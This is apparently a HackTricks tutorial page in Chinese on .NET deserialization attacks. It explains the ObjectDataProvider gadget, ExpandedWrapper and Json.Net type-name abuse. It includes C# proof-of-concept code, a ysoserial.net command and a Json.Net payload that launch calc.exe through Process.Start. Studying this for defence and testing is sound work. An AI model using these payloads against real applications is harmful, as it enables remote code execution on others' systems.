基本 .Net 反序列化 (ObjectDataProvider 小工具, ExpandedWrapper 和 Json.Net)
Reading time: 7 minutes
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
本文旨在理解如何利用 ObjectDataProvider 小工具来获得 RCE,以及如何利用序列化库Json.Net 和 xmlSerializer与该小工具进行滥用。
ObjectDataProvider 小工具
根据文档:ObjectDataProvider 类包装并创建一个可以用作绑定源的对象。
是的,这个解释有点奇怪,让我们看看这个类有什么有趣的地方:这个类允许包装任意对象,使用_MethodParameters_来设置任意参数,然后使用 MethodName 调用使用任意参数声明的任意对象的任意函数。
因此,任意对象将在反序列化时执行一个带有参数的函数**。
这怎么可能
System.Windows.Data 命名空间在 C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF
的 PresentationFramework.dll 中定义和实现了 ObjectDataProvider。
使用 dnSpy 你可以检查我们感兴趣的类的代码。在下面的图像中,我们看到的是 PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> 方法名称 的代码。
如你所见,当 MethodName
被设置时,调用了 base.Refresh()
,让我们看看它的作用:
好的,让我们继续看看 this.BeginQuery()
的作用。BeginQuery
被 ObjectDataProvider
重写,以下是它的作用:
注意在代码的末尾调用了 this.QueryWorke(null)
。让我们看看它执行了什么:
注意这不是 QueryWorker
函数的完整代码,但它展示了有趣的部分:代码调用 this.InvokeMethodOnInstance(out ex);
,这是方法集被调用的那一行。
如果你想检查仅设置_MethodName_**就会被执行**,你可以运行以下代码:
using System.Windows.Data;
using System.Diagnostics;
namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ObjectDataProvider myODP = new ObjectDataProvider();
myODP.ObjectType = typeof(Process);
myODP.MethodParameters.Add("cmd.exe");
myODP.MethodParameters.Add("/c calc.exe");
myODP.MethodName = "Start";
}
}
}
注意,您需要添加作为引用 C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll 以加载 System.Windows.Data
ExpandedWrapper
使用之前的漏洞,将会有一些情况,其中 对象 将被 反序列化为 一个 ObjectDataProvider 实例(例如在 DotNetNuke 漏洞中,使用 XmlSerializer,对象是通过 GetType
反序列化的)。然后,将对 ObjectDataProvider 实例中封装的 对象类型没有任何了解(例如 Process
)。您可以在这里找到更多关于 DotNetNuke 漏洞的 信息。
这个类允许 指定封装在给定实例中的对象类型。因此,这个类可以用来将源对象 (ObjectDataProvider) 封装到一个新的对象类型中,并提供我们需要的属性 (ObjectDataProvider.MethodName 和 ObjectDataProvider.MethodParameters)。
这在之前提到的情况中非常有用,因为我们将能够 将 _ObjectDataProvider** 包装在一个 **ExpandedWrapper _ 实例中,并且 在反序列化时 这个类将 创建 OjectDataProvider 对象,该对象将 执行 在 MethodName 中指示的 函数。
您可以使用以下代码检查这个包装器:
using System.Windows.Data;
using System.Diagnostics;
using System.Data.Services.Internal;
namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
myExpWrap.ProjectedProperty0 = new ObjectDataProvider();
myExpWrap.ProjectedProperty0.ObjectInstance = new Process();
myExpWrap.ProjectedProperty0.MethodParameters.Add("cmd.exe");
myExpWrap.ProjectedProperty0.MethodParameters.Add("/c calc.exe");
myExpWrap.ProjectedProperty0.MethodName = "Start";
}
}
}
Json.Net
在官方网站上指出,该库允许使用Json.NET强大的JSON序列化程序序列化和反序列化任何.NET对象。因此,如果我们能够反序列化ObjectDataProvider小工具,我们可以仅通过反序列化一个对象来导致RCE。
Json.Net示例
首先,让我们看一个如何使用该库序列化/反序列化对象的示例:
using System;
using Newtonsoft.Json;
using System.Diagnostics;
using System.Collections.Generic;
namespace DeserializationTests
{
public class Account
{
public string Email { get; set; }
public bool Active { get; set; }
public DateTime CreatedDate { get; set; }
public IList<string> Roles { get; set; }
}
class Program
{
static void Main(string[] args)
{
Account account = new Account
{
Email = "james@example.com",
Active = true,
CreatedDate = new DateTime(2013, 1, 20, 0, 0, 0, DateTimeKind.Utc),
Roles = new List<string>
{
"User",
"Admin"
}
};
//Serialize the object and print it
string json = JsonConvert.SerializeObject(account);
Console.WriteLine(json);
//{"Email":"james@example.com","Active":true,"CreatedDate":"2013-01-20T00:00:00Z","Roles":["User","Admin"]}
//Deserialize it
Account desaccount = JsonConvert.DeserializeObject<Account>(json);
Console.WriteLine(desaccount.Email);
}
}
}
滥用 Json.Net
使用 ysoserial.net 我创建了这个漏洞:
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
在这段代码中,你可以测试漏洞,只需运行它,你将看到一个计算器被执行:
using System;
using System.Text;
using Newtonsoft.Json;
namespace DeserializationTests
{
class Program
{
static void Main(string[] args)
{
//Declare exploit
string userdata = @"{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}";
//Exploit to base64
string userdata_b64 = Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(userdata));
//Get data from base64
byte[] userdata_nob64 = Convert.FromBase64String(userdata_b64);
//Deserialize data
string userdata_decoded = Encoding.UTF8.GetString(userdata_nob64);
object obj = JsonConvert.DeserializeObject<object>(userdata_decoded, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
}
}
}
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。